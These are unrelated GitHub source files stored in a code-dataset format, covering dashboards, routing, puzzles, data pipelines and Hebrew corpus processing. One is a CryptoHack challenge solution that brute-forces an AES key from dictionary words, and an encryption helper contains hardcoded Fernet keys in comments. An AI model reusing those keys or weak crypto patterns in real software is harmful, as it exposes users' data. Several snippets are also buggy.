import Dash, dcc, html, Input, Output, no_update\nimport pandas as pd\nimport plotly.express as px\n\n# Reading data\ndf = pd.read_table(\n \"https://raw.githubusercontent.com/plotly/datasets/master/global_super_store_orders.tsv\"\n)\n\n# Transforming column types so that datetime functions can be applied correctly\ndf[\"Order Date\"] = pd.to_datetime(df[\"Order Date\"])\ndf[\"Profit\"] = df[\"Profit\"].str.replace(\",\", \".\")\ndf[\"Profit\"] = df[\"Profit\"].astype(\"float\")\n\n\n# Transforming 'Order Date' column into yyyy-mm format\ndf[\"year_month\"] = pd.DatetimeIndex(df[\"Order Date\"]).to_period(\"M\").astype(str)\n\n# Grouping data as per 'Order Date' dimension.\n# Getting time series - profit per month.\ndf_grouped = (\n df[[\"Order Date\", \"Profit\"]]\n .groupby(by=pd.Grouper(key=\"Order Date\", axis=0, freq=\"M\"))\n .sum()\n .reset_index()\n)\n\n# Creating base bar chart.\n# Why 'base'? --> Because it will be shown on page all the time.\n# Below there is one bar chart that will be shown only on hover.\nfig = px.bar(data_frame=df_grouped, x=\"Order Date\", y=\"Profit\", template=\"simple_white\")\n\nfig.update_layout(margin=dict(t=50, l=25, r=25, b=25))\n\n# turn off native plotly.js hover effects - make sure to use\n# hoverinfo=\"none\" rather than \"skip\" which also halts events.\nfig.update_traces(hoverinfo=\"none\", hovertemplate=None)\n\n\napp = Dash(__name__)\n\napp.layout = html.Div(\n [\n html.H4(\"Dash Tooltip Example\", style={\"textAlign\": \"center\"}),\n # Base bar chart i.e. bar chart that will always be shown on map.\n dcc.Graph(id=\"tooltip-graph-basic-2\", figure=fig, clear_on_unhover=True),\n # Component that will be updated when on hover.\n # Here will come graph created in display_hover callback function.\n dcc.Tooltip(id=\"tooltip-graph\", direction=\"left\"),\n ]\n)\n\n\n@app.callback(\n Output(\"tooltip-graph\", \"show\"),\n Output(\"tooltip-graph\", \"bbox\"),\n Output(\"tooltip-graph\", \"children\"),\n Input(\"tooltip-graph-basic-2\", \"hoverData\"),\n)\ndef display_hover(hover_data):\n\n # Do not show tooltip popup window if mouse is not hovered over\n if hover_data is None:\n return False, no_update, no_update\n\n # print(hover_data)\n # Here we are getting data about X-axis of hovered bar chart\n # i.e. we are interested in date of hovered bar.\n x = hover_data[\"points\"][0][\"x\"]\n\n # Here we are filtering first 7 digits of date value.\n # Why first 7? 
--> because we want the year and month.\n    # We are not interested in the day.\n    date_month = x[:7]\n\n    # Filtering initial DataFrame in order to get specific month.\n    df_filtered = df.query(f\"year_month == '{date_month}'\")\n\n    # Grouping data so that we have DataFrame grouped as per 'Segment' dimension.\n    df_filtered_grouped = (\n        df_filtered[[\"Segment\", \"Profit\"]].groupby(by=\"Segment\").sum().reset_index()\n    )\n\n    # Creating Plotly figure that will be shown in tooltip\n    fig1 = px.bar(\n        data_frame=df_filtered_grouped, x=\"Segment\", y=\"Profit\", template=\"simple_white\"\n    )\n    fig1.update_layout(margin=dict(t=0, l=0, r=0, b=0))\n\n    # Purpose of following two lines is to get info about bounding box i.e.\n    # about coordinates of popup window/tooltip window that will be created.\n    pt = hover_data[\"points\"][0]\n    bbox = pt[\"bbox\"]\n\n    children = [\n        html.Div(\n            [\n                html.H4(f\"Year-Month: {date_month}\"),\n                dcc.Graph(figure=fig1),\n            ],\n            style={\"width\": \"200px\", \"height\": \"200px\", \"whiteSpace\": \"normal\"},\n        )\n    ]\n\n    return True, bbox, children\n\n\nif __name__ == \"__main__\":\n    app.run_server(debug=True)\n","repo_name":"AnnMarieW/dash-app-gallery","sub_path":"examples/tooltip.py","file_name":"tooltip.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"79"}{"seq_id":"40756428948","text":"\ndef receiver():\n    \"\"\"Using yield as a receiver\"\"\"\n    while True:\n        item = yield\n        print(\"Got: \", item)\n\nif __name__ == '__main__':\n    # create generator\n    c = receiver()\n    print(c)\n    # advance to yield\n    next(c)\n    # now you can send stuff\n    c.send(43)\n    c.send([1, 2, 3])\n    c.send(\"Hello\")\n","repo_name":"soltysh/talks","sub_path":"2014/pyconpl/examples/generator2.py","file_name":"generator2.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"}{"seq_id":"33816659352","text":"from cryptography.fernet import Fernet\r\nimport mysql.connector\r\nimport os\r\nimport random\r\n###Encryption layer for the Game Console\r\nprint(\"[ ENCRYPTION ] : Encryption layer for the Zauth system has been loaded\")\r\n#key=\"I8sMQvPAFHA3VHFn0i-lOLSF5SZKusCRWxXaWs14eX4=\"\r\n#key2=\"deA6J0ynM309jkn4o4nYyGhecnqRaQBL4IjOxXRF1tM=\"\r\ndef encrypt(ins,key):\r\n    print(\"[ ENCRYPTION ] : Encrypting using key: \"+str(key))\r\n    cipher_suite= Fernet(key)\r\n\r\n    #print(\"encrypting:\"+str(ins))\r\n    rand=random.randint(0,1)\r\n#    print(rand)\r\n    if rand==1:\r\n        cipher_text=cipher_suite.encrypt(ins.encode())\r\n        try:\r\n            cipher_text2=cipher_suite.encrypt(cipher_text.encode())\r\n        except:\r\n            cipher_text2=cipher_suite.encrypt(cipher_text)\r\n    else:\r\n        cipher_text=cipher_suite.encrypt(ins.encode())\r\n\r\n    return cipher_text\r\ndef decrypt(ins,key):\r\n    cipher_suite= Fernet(key)\r\n    x=1\r\n    #print('Decrypting:'+str(ins))\r\n    plain_text = cipher_suite.decrypt(ins.encode())\r\n\r\n    try:\r\n        x=x+1\r\n        #print(\"Attempting decrypt\"+str(x))\r\n        plain_text=cipher_suite.decrypt(plain_text.encode())\r\n    except:\r\n        try:\r\n            #print(\"Attempting decrypt\"+str(x))\r\n            plain_text=cipher_suite.decrypt(plain_text)\r\n        except:\r\n            pass\r\n    try:\r\n        return plain_text.decode()\r\n    except:\r\n        return 
plain_text\r\n","repo_name":"zapinator3000/Zauth4","sub_path":"Zauth4_Server/encryption.py","file_name":"encryption.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"3124388651","text":"#!/usr/bin/python3\nfrom Crypto.Cipher import AES\nimport hashlib\nimport random\n\n# https://gist.githubusercontent.com/wchargin/8927565/raw/d9783627c731268fb2935a731a618aa8e95cf465/words\nwith open(\"/home/adam/projects/github/crypto_hack/aes/password_as_keys/dictionary_words\") as f:\n    words = [w.strip() for w in f.readlines()]\n\nciphertext = \"c92b7734070205bdf6c0087a751466ec13ae15e6f1bcdd3f3a535ec0f4bbae66\"\n\ndef decrypt(ciphertext, KEY):\n    ciphertext = bytes.fromhex(ciphertext)\n\n    cipher = AES.new(KEY, AES.MODE_ECB)\n    try:\n        decrypted = cipher.decrypt(ciphertext)\n    except ValueError as e:\n        return {\"error\": str(e)}\n\n    return {\"plaintext\": decrypted.hex()}\n\n\n\nfor w in words:\n    keyword = w\n    KEY = hashlib.md5(keyword.encode()).digest()\n    tmp = decrypt(ciphertext, KEY)['plaintext']\n    if \"63727970746f7b\" in tmp: #63727970746f7b crypto\n        print(keyword)\n        print(tmp)\n        print(KEY)\n        print(KEY.hex())  # KEY is already bytes; bytes.fromhex(KEY) would raise a TypeError\n        ","repo_name":"adamkrawczyk/crypto_hack_solutions","sub_path":"aes/password_as_keys/2-password_as_key.py","file_name":"2-password_as_key.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"10103088021","text":"import numpy as np\nimport math\n\ndef sigmoid(x):\n    return 1 / (1 + math.exp(-x))\n\ndef softmax(x):\n    \"\"\"Compute softmax values for each set of scores in x.\"\"\"\n    return np.exp(x) / np.sum(np.exp(x), axis=0)\n\nprint(sigmoid(6))\nprint(sigmoid(7))\nprint(sigmoid(20))\n\ntmp1 = softmax([5,6,5.5])\ntmp2 = softmax([2.7,2.8,4.2,])\ntmp3 = softmax([9.7,9.8,6.4])\n","repo_name":"sohcalvin/ref","sub_path":"python/ttt.py","file_name":"ttt.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}{"seq_id":"70503720256","text":"from lib.funcionalidades import *\r\nfrom time import sleep\r\n\r\n# ------------------------------------------------------------------------\r\n# Ready-made messages\r\n# ------------------------------------------------------------------------\r\n\r\ndef mensagem(txt):\r\n    qnt = len(txt) + 4\r\n    print('~'*qnt)\r\n    print(txt.center(qnt))\r\n    print('~'*qnt)\r\n\r\n# ------------------------------------------------------------------------\r\n# Show the total value and the purchased products\r\n# ------------------------------------------------------------------------\r\n\r\ndef final():\r\n    count = 0\r\n    try:\r\n        arq2 = open('dadosTemp.txt', 'r')\r\n        txt = 'RESUMO DA COMPRA'\r\n        print('~'*115)\r\n        print(txt.center(115))\r\n        print('~'*115)\r\n        for linha in arq2:\r\n            dado = linha.split(';')\r\n            dado[3] = dado[3].replace('\\n', '')\r\n            converte2 = float(dado[3])\r\n            count += converte2\r\n            print('-'*115)\r\n            print(f'Código: {dado[0]:<20} Produto: {dado[1]:<20} Quantidade: {dado[2]:<20} Total: R${dado[3]:<20}')\r\n            sleep(0.5)\r\n        print('-'*115)\r\n        print(f'Total da Compra: R${count}')\r\n        dinheiro = leiaFloat('Digite o dinheiro recebido: ')\r\n        conta = dinheiro - count\r\n        if conta == 0:\r\n            print('Não é necessário troco')\r\n        else:\r\n            print(f'Troco: R${conta}')\r\n    except:\r\n        print('Houve um erro ao abrir o arquivo')\r\n    finally:\r\n        arq2 = open('dadosTemp.txt', 'w')\r\n        
arq2.write('')\r\n    ","repo_name":"Gabriel-R14/caixa-registradora-v2","sub_path":"lib/interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"35926028162","text":"\"\"\" Welcome to Meta!\nThis is just a simple shared plaintext pad,\nwith no execution capabilities.\n\nWhen you know what language you would like\nto use for your interview, simply choose it\nfrom the dropdown in the top bar.\n\nEnjoy your interview!\n\n# question 1\n\nGiven a string of characters, write a method that returns\ntrue if the string represents a valid number.\n\n\"13\" - --> true\n\"3.0\" - --> true\n\"-7.4\" - --> true\n\"-13.5\" - --> true\n\"abc\" - --> false\n\"123a\" - --> false\n\"-.\" - --> false\n\"-..--\" - --> false\n\"1.0.0.1\" -> false\n\n\"\"\"\nimport pandas as pd\n\n\ndef check_string_ints(s: str) -> bool:\n    for i in s:\n        try:\n            char = int(i)\n        except ValueError as e:\n            print(f\"found a string not int {e}\")\n            return False\n        if type(char) == int:\n            return True\n        else:\n            return False\n\n\ndef check_string_int(s: str) -> bool:  # \"123a\"  # 3.0\"\n    n = len(s)\n    sub = s[0]  # '3'\n    for i in s:  # 1\n        if int(sub):  # int('3.5')\n            sub += s[i + 1]  # '3.'\n            result = True\n        else:\n            return False\n    return result\n\n\n\"\"\"\n#question 2\n\nGiven the coordinates of a facebook user and some\nshops, return the k shops closest to the user\n\nInput:\nuser = (3, 1)\nk = 2\nshops = (\"A\", 3, 3), (\"B\", 9, 1)(\"C\", 4, 2)\n\nOutput: [\"A\", \"C\"]\n\n// |\n// | A\n// | C\n// | *B\n// --o - -----------\n// |\n\"\"\"\nfrom math import sqrt\n\n\ndef euclidean_distance(a, b, c, d):\n    return sqrt((a - c) ** 2 + (b - d) ** 2)\n\n\nuser = (3, 1)\nshops = [(\"A\", 3, 3), (\"B\", 9, 1), (\"C\", 4, 2), (\"Z\", 1, 2)]\n\n\ndef find_closest_k_shops(k, person, location):\n    shop_dict = {}\n    # each entry looks like (\"A\", 3, 3)\n    for name, sx, sy in location:  # euclidean_distance(3, 1, 3, 3)\n        shop_dict[name] = euclidean_distance(*person, sx, sy)\n    # sort the shops by distance and return the k closest names\n    closest = sorted(shop_dict.items(), key=lambda kv: kv[1])\n    return [name for name, _ in closest[:k]]\n\n\nx = find_closest_k_shops(5, user, shops)\n","repo_name":"mconwa02/gcp_prep","sub_path":"04_interview_code.py","file_name":"04_interview_code.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"19871578137","text":"# https://tech-blog.optim.co.jp/entry/2019/12/09/080000\n# Pretty fast\n\nimport sys\n\ndef wc_block_64k(name, blocksize=65536):\n    def blocks(f):\n        while True:\n            b = f.read(blocksize)\n            if b:\n                yield b\n            else:\n                break\n\n    with open(name, 'r') as f:\n        return sum(bl.count('\\n') for bl in blocks(f))\n","repo_name":"nepia11/python-fast-line-counter","sub_path":"wc.py","file_name":"wc.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"35500921990","text":"import copy\nimport json\nimport math\n\nfrom simulator.node import Node\n\n\nclass Distance_Vector:\n    def __init__(self, cost: int, path: list):\n        self.cost = cost\n        self.path = path\n\n    def __eq__(self, another):\n        return self.cost == another.cost and self.path == another.path\n\n\nclass Distance_Vector_Node(Node):\n    def __init__(self, id):\n        super().__init__(id)\n        self.distance_vectors_self = {}\n        self.distance_vectors_neighbor = {}\n 
self.sequence_number = 0\n self.neighbor_link_cost = {}\n self.neighbor_sequence_numbers = {}\n\n def __str__(self): #done\n message = {}\n message[\"self_sequence_number\"] = self.sequence_number\n self.sequence_number += 1\n for dst, val in self.distance_vectors_self.items():\n dict = {}\n dict[\"path\"] = val.path\n dict[\"cost\"] = val.cost\n message[dst] = dict\n return json.dumps(message)\n\n def link_has_been_updated(self, neighbor, latency):\n if latency == -1:\n self.delete_link(neighbor)\n else:\n self.neighbor_link_cost[neighbor] = latency\n self.update_dvs()\n\n def delete_link(self,neighbor: int):\n self.neighbor_link_cost.pop(neighbor)\n self.distance_vectors_neighbor.pop(neighbor)\n self.distance_vectors_self.pop(neighbor)\n\n def update_dvs(self):\n old_dvs = copy.deepcopy(self.distance_vectors_self)\n self.distance_vectors_self = {}\n self.update_self_neighbour()\n for source, dvs in self.distance_vectors_neighbor.items():\n for destination, dv in dvs.items():\n if source in self.neighbor_link_cost:\n new_cost = self.neighbor_link_cost[source] + dv.cost\n if destination not in self.distance_vectors_self:\n self.update_cost(destination,dv,new_cost)\n if destination in self.distance_vectors_self and new_cost < self.distance_vectors_self[destination].cost:\n self.update_cost(destination, dv, new_cost)\n if self.distance_vectors_self != old_dvs: #eq\n self.send_to_neighbors(str(self))\n\n def update_self_neighbour(self):\n for neighbor, link_cost in self.neighbor_link_cost.items():\n path = [self.id, neighbor]\n self.distance_vectors_self[neighbor] = Distance_Vector(link_cost, path)\n\n def update_cost(self, dst:int, dv:Distance_Vector, newcost:int):\n new_path = [self.id] + copy.deepcopy(dv.path)\n self.distance_vectors_self[dst] = Distance_Vector(newcost, new_path)\n # Fill in this function\n\n\n\n def process_incoming_routing_message(self, m):\n distance_vector_neighbor_message,sequence_number = self.processJson(m)\n flag = False\n id1 = next(iter(distance_vector_neighbor_message))\n id2 = \"path\"\n neighbor = int(distance_vector_neighbor_message[id1][id2][0])\n to_delete = []\n if neighbor not in self.distance_vectors_neighbor:\n self.distance_vectors_neighbor[neighbor] = {}\n if neighbor in self.neighbor_sequence_numbers:\n if sequence_number < self.neighbor_sequence_numbers[neighbor]:\n return\n for dst, value in self.distance_vectors_neighbor[neighbor].items():\n if(str(dst) not in distance_vector_neighbor_message):\n to_delete.append(dst)\n for dst_str, value in distance_vector_neighbor_message.items():\n dst = int(dst_str)\n link = Distance_Vector(value['cost'], value['path'])\n\n looped = (self.id in link.path)\n if(not ((dst not in self.distance_vectors_neighbor[neighbor]) and looped)):\n flag = True\n if (dst in self.distance_vectors_neighbor[neighbor]):\n if(looped):\n self.distance_vectors_neighbor[neighbor].pop(dst) #distance_vectors_neighbor is the dict of dict\n else:\n self.distance_vectors_neighbor[neighbor][dst] = link\n else:\n if(not looped):\n self.distance_vectors_neighbor[neighbor][dst] = link\n\n\n if(len(to_delete) > 0):\n flag = True\n for dst in to_delete:\n self.distance_vectors_neighbor[neighbor].pop(dst)\n self.neighbor_sequence_numbers[neighbor] = sequence_number\n if flag:\n self.update_dvs()\n\n def processJson(self,m):\n distance_vector_neighbor_message = json.loads(m)\n sequence_number = distance_vector_neighbor_message[\"self_sequence_number\"]\n distance_vector_neighbor_message.pop('self_sequence_number')\n return 
distance_vector_neighbor_message,sequence_number\n\n    def get_next_hop(self, destination):\n        if destination in self.distance_vectors_self:\n            return self.distance_vectors_self[destination].path[1]\n        return -1","repo_name":"Shaoming827/projecr3","sub_path":"distance_vector_node.py","file_name":"distance_vector_node.py","file_ext":"py","file_size_in_byte":4938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"43605491174","text":"# Days are numbered from 1 so that the every-2nd-day and every-3rd-day effects trigger on the right days\n\ndays = int(input())\nplayers_count = int(input())\ngroups_energy = float(input())\n\nwater_per_person = float(input())\nfood_per_person = float(input())\n\ntotal_water = water_per_person * players_count * days\ntotal_food = food_per_person * players_count * days\nis_over = False\n\nfor day in range(1, days + 1):\n    energy_loss = float(input())\n    groups_energy -= energy_loss\n    if groups_energy <= 0:\n        is_over = True\n        break\n    if day % 2 == 0:\n        groups_energy += groups_energy * 0.05\n        total_water -= total_water * 0.30\n    if day % 3 == 0:\n        total_food -= total_food / players_count\n        groups_energy += groups_energy * 0.10\n\nif is_over:\n    print(f\"You will run out of energy. You will be left with {total_food:.2f} food and {total_water:.2f} water.\")\nelse:\n    print(f\"You are ready for the quest. You will be left with - {groups_energy:.2f} energy!\")\n","repo_name":"ForbiddenBG/SoftUni","sub_path":"Fundamentals_Module/Exam_Preparation/Final_Exam/from_javaScript_to_python/the_hunting_games.py","file_name":"the_hunting_games.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"18569594023","text":"def solve_e(n, a_list):\n    days = 0\n    ind_list = [0] * n\n    match_count = 0\n    queue = list(range(n))\n    stack = dict()\n    while len(queue) > 0:\n        days += 1\n        new_queue = []\n        for p in queue:\n            if ind_list[p] < n - 1:\n                q = a_list[p][ind_list[p]] - 1\n                k = str(min(p, q)) + \"_\" + str(max(p, q))\n                if k in stack.keys():\n                    ind_list[p] += 1\n                    ind_list[q] += 1\n                    # print(days, p, q)\n                    new_queue.append(p)\n                    new_queue.append(q)\n                    match_count += 1\n                else:\n                    stack[k] = 1\n        queue = new_queue\n    if match_count == n * (n - 1) // 2:\n        return days - 1\n    else:\n        return -1\n\n\ndef test():\n    n = 1000\n    a_list = []\n    for i in range(n):\n        a_list.append(list(range(1, i + 1)) + list(range(i + 2, n + 1)))\n    print(solve_e(n, a_list))\n\n\ndef main():\n    n = int(input())\n    a_list = []\n    for _ in range(n):\n        a_list.append(list(map(int, input().split())))\n    print(solve_e(n, a_list))\n\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"k-harada/AtCoder","sub_path":"ABC/ABC101-150/ABC139/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"}{"seq_id":"37106669160","text":"\"\"\"\nThis script splits the provided dataframe into a test set and a remainder\n\nDate: 07/March/2023\nDeveloper: ashbab khan\n\n\"\"\"\n\nimport argparse\nimport logging\nimport tempfile\nimport pandas as pd\nimport wandb\nfrom sklearn.model_selection import train_test_split\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\ndef go(args):\n    \"\"\"\n    This function fetches the clean data artifact, splits it into two\n    dataframes, trainval and test, based on the test size we pass,\n    and saves them as two separate artifacts.\n\n    \"\"\"\n\n    run = wandb.init(job_type=\"train_val_test_split\")\n 
run.config.update(args)\n\n # Downloading input artifact. This will also note that this script is using this\n # particular version of the artifact\n logger.info(f\"Fetching artifact {args.input}\")\n artifact_local_path = run.use_artifact(args.input).file()\n\n df = pd.read_csv(artifact_local_path)\n\n logger.info(\"Splitting trainval and test\")\n trainval, test = train_test_split(\n df,\n test_size=args.test_size,\n random_state=args.random_seed,\n stratify=df[args.stratify_by] if args.stratify_by != 'none' else None,\n )\n\n # This loop will generate two artifacts\n for df, k in zip([trainval, test], ['trainval', 'test']):\n logger.info(f\"Uploading {k}_data.csv dataset\")\n with tempfile.NamedTemporaryFile(\"w\") as fp:\n\n # Saving the csv file\n df.to_csv(fp.name, index=False)\n\n # Creating a new Artifact\n artifact = wandb.Artifact(\n f\"{k}_data.csv\",\n f\"{k}_data\",\n f\"{k} split of data\"\n )\n\n # Adding the recently saved csv to the artifact\n artifact.add_file(fp.name)\n\n # Uploading the artifact to Weights and Biases\n run.log_artifact(artifact)\n artifact.wait()\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Split test and remainder\")\n\n parser.add_argument(\"--input\", type=str, help=\"Input artifact to split\")\n\n parser.add_argument(\n \"--test_size\",\n type=float,\n help=\"Size of the test split. Fraction of the dataset, or number of items\")\n\n parser.add_argument(\n \"--random_seed\",\n type=int,\n help=\"Seed for random number generator\",\n default=42,\n required=False)\n\n parser.add_argument(\n \"--stratify_by\",\n type=str,\n help=\"Column to use for stratification\",\n default='none',\n required=False)\n\n args = parser.parse_args()\n\n go(args)\n","repo_name":"ashbabkhan2/Building-an-ML-pipeline-for-short-term-rental-prices","sub_path":"components/train_val_test_split/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2628,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"35193059560","text":"N = int(input())\narr = list(map(int, input().split()))\n\nMAX_K = 6\nMAX_DIGIT = 10\n\ndef radix_sort():\n global arr\n\n p = 1\n for pos in range(MAX_K):\n new_arr = [[] for _ in range(MAX_DIGIT)]\n for elem in arr:\n digit = (elem // p) % 10\n new_arr[digit].append(elem)\n \n arr = []\n for digit in range(MAX_DIGIT):\n for elem in new_arr[digit]:\n arr.append(elem)\n \n p *= 10\n\nradix_sort()\n\nprint(*arr)","repo_name":"lbu0413/codetree-TILs","sub_path":"231125/기수 정렬 구현/implement-radix-sort.py","file_name":"implement-radix-sort.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12603149811","text":"#!/usr/bin/env python3\nfrom tile import Tile as Tile\nfrom game import Game\nfrom gui import Gui\nfrom operator import itemgetter\nfrom copy import deepcopy\n \n\nclass AStarSearch():\n __sqrToInt = {\n Tile.ZERO : 0,\n Tile.ONE : 1,\n Tile.TWO : 2,\n Tile.THREE : 3,\n Tile.FOUR : 4,\n Tile.BADZERO : 0,\n Tile.BADONE : 1,\n Tile.BADTWO : 2,\n Tile.BADTHREE : 3,\n Tile.BADFOUR : 4,\n }\n\n def __init__(self, game) -> None:\n self.game = game\n self.visited = set()\n self.queue = []\n\n def search(self):\n self.queue.append((self.game, self.h1(self.game), 0))\n\n while self.queue:\n current = self.queue.pop(0)\n\n if current[0] not in self.visited:\n self.visited.add(current[0])\n if current[0].isGameWon():\n self.game = current[0]\n break\n 
self.queue.extend(self.successors(current[0], current[2]))\n                self.queue.sort(key = lambda x: x[1]+x[2])\n\n    \n    def h1(self, game):\n        # sum of numbers - sum of already satisfied numbers\n        numbers = 0\n        satisfaction = 0\n        emptys = 0\n        for rows in range(7):\n            for columns in range(7):\n                if game.board[rows][columns] in [Tile.ZERO, Tile.ONE, Tile.TWO, Tile.THREE, Tile.FOUR]:\n                    numbers += self.__sqrToInt[game.board[rows][columns]]\n                    satisfaction += self.__numOfLightsAround(game, rows, columns)\n        return numbers - satisfaction\n    \n    def __numOfLightsAround(self, game, row, column):\n        lights = 0\n        \n        if not row==0 and game.board[row-1][column] == Tile.LIGHT:\n            lights += 1\n        if not row==6 and game.board[row+1][column] == Tile.LIGHT:\n            lights += 1\n        if not column==0 and game.board[row][column-1] == Tile.LIGHT:\n            lights += 1\n        if not column==6 and game.board[row][column+1] == Tile.LIGHT:\n            lights += 1\n        \n        return lights\n\n    \n    def successors(self, game, cost):\n        nexts = []\n        for rows in range(7):\n            for columns in range(7):\n                if game.board[rows][columns] == Tile.EMPTY:\n                    next = deepcopy(game)\n                    next.click(1, rows, columns)\n                    if next.isBoardStateLegit():\n                        h = self.h1(next)\n                        nexts.append((next, h, cost))\n        return nexts\n\n\ndef main():\n    pass\n\n###################################################\n\n\nif __name__ ==\"__main__\":\n    main()","repo_name":"afeherzoli/LightUp","sub_path":"searches/a_star_search.py","file_name":"a_star_search.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"15422883035","text":"#3) Check whether a positive integer n is prime.\nnumeroInteiro = int(input(\"Digite um número inteiro \\nResposta:\"))\nEncontrouDivisivel, numeroMultiplio = 0, 0\nif numeroInteiro <= 1:\n    print('{} não é um número primo'.format(numeroInteiro))\nelse:\n    while numeroMultiplio <= numeroInteiro or EncontrouDivisivel < 2:\n        numeroMultiplio = numeroMultiplio + 1\n        Encontrou = numeroInteiro % numeroMultiplio\n        if Encontrou == 0:\n            EncontrouDivisivel = EncontrouDivisivel + 1\n    if EncontrouDivisivel <= 2:\n        print(f\"{numeroInteiro} é um número primo\")\n    else:\n        print(f\"{numeroInteiro} não é um primo\")","repo_name":"BrunoSerpa/Exercicios-Python_ALP","sub_path":"Lista 03 (bônus)/Exercício03.py","file_name":"Exercício03.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}{"seq_id":"25689095965","text":"\"\"\"\nHere the harmonization of BHSA and DSS data takes place. These are two different datasets with different conventions.\nThe overarching class is Corpus. A corpus contains data about all the relevant\nbiblical manuscripts. 
A Corpus object contains Scroll objects, and a scroll contains Verse objects and Word objects.\n\nThe scrolls include the biblical Dead Sea Scrolls and the Codex Leningradensis, here called MT.\n\nThe MT dataset is based on the text-fabric dataset Biblia Hebraica Stuttgartensia Amstelodamensis\n(see github.com/etcbc/bhsa).\nThe DSS dataset is based on the text-fabric dataset DSS (see github.com/etcbc/dss).\n\nTODO: add processing of SP data.\n\"\"\"\nfrom dataclasses import dataclass, field\n\nfrom add_hebrew_text_column import HebrewTextAdder\nfrom config import bhsa_version, dss_version, sp_version\nfrom special_data import j_lexemes, fem_end_words, fem_ending_numbers, relevant_wt_words\n\nfrom tf.app import use\nDSS = use('etcbc/dss:clone', checkout='clone', version=dss_version, provenanceSpec=dict(moduleSpecs=[]))\nFdss, Ldss, Tdss = DSS.api.F, DSS.api.L, DSS.api.T\n\nSP = use('dt-ucph/sp:clone', checkout='clone', version=sp_version, provenanceSpec=dict(moduleSpecs=[]))\nFsp, Lsp, Tsp = SP.api.F, SP.api.L, SP.api.T\n\nMT = use('etcbc/bhsa', version=bhsa_version)\nMT.load(['g_prs', 'g_nme', 'g_pfm', 'g_vbs', 'g_vbe'])\nF, L, T = MT.api.F, MT.api.L, MT.api.T\n\n\n@dataclass\nclass Word:\n \"\"\"prefix are concatenated g_cons of words prefixed to a word, often article or prep\"\"\"\n tf_word_id: int\n book: str\n chapter_num: int\n verse_num: int\n g_cons: str\n lex: str\n sp: str\n person: str\n number: str\n gender: str\n state: str\n vs: str\n vt: str\n lang: str\n rec_signs: str\n cor_signs: str\n stem: str = ''\n prs_cons: str = ''\n nme_cons: str = ''\n hloc: str = ''\n matres_pattern: str = ''\n prefix: str = ''\n heb_g_cons: str = ''\n g_pfm: str = ''\n g_vbs: str = ''\n g_vbe: str = ''\n stem_pattern = ''\n pattern = ''\n\n\n@dataclass\nclass Verse:\n manuscript: str\n bo: str\n ch: int\n ve: int\n words: list[Word] = field(default_factory=list)\n\n\nclass Scroll:\n scrolls = {}\n\n def __init__(self, scroll_name):\n self.scroll_name = scroll_name\n self.verses = {}\n self.words = []\n Scroll.scrolls[scroll_name] = self\n\n\nclass MTWordProcessor:\n \"\"\"\"\"\"\n def __init__(self, tf_id):\n\n self.prs_chars = {'>', 'D', 'H', 'J', 'K', 'M', 'N', 'W'}\n self.consonants = {'<', '>', 'B', 'C', 'D', 'F', 'G', 'H', 'J', 'K', 'L', 'M',\n 'N', 'P', 'Q', 'R', 'S', 'T', 'V', 'W', 'X', 'Y', 'Z', '#'}\n\n self.tf_id = tf_id\n self.book = F.book.v(tf_id)\n self.chapter_num = F.chapter.v(tf_id)\n self.verse_num = F.verse.v(tf_id)\n self.lexeme = F.lex.v(tf_id)\n self.glyphs = F.g_cons.v(tf_id)\n self.hloc = self.get_he_locale()\n self.sp = F.sp.v(tf_id)\n self.number = self.get_number()\n self.person = F.ps.v(tf_id)\n self.gender = self.get_gender()\n self.state = self.get_state()\n self.vs = F.vs.v(tf_id)\n self.vt = F.vt.v(tf_id)\n self.lang = F.language.v(tf_id)\n self.rec_signs = ''.join(['n' for char in self.glyphs])\n self.cor_signs = ''.join(['n' for char in self.glyphs])\n self.nme = self.get_nme()\n self.prs = self.get_prs()\n self.stem = self.get_stem()\n self.heb_text_adder = HebrewTextAdder(self.glyphs)\n self.heb_g_cons = self.heb_text_adder.get_hebrew_g_cons()\n self.g_pfm = self.get_pfm()\n self.g_vbs = self.get_vbs()\n self.g_vbe = self.get_vbe()\n\n def create_word(self):\n\n return Word(self.tf_id,\n self.book,\n self.chapter_num,\n self.verse_num,\n self.glyphs,\n self.lexeme,\n self.sp,\n self.person,\n self.number,\n self.gender,\n self.state,\n self.vs,\n self.vt,\n self.lang,\n self.rec_signs,\n 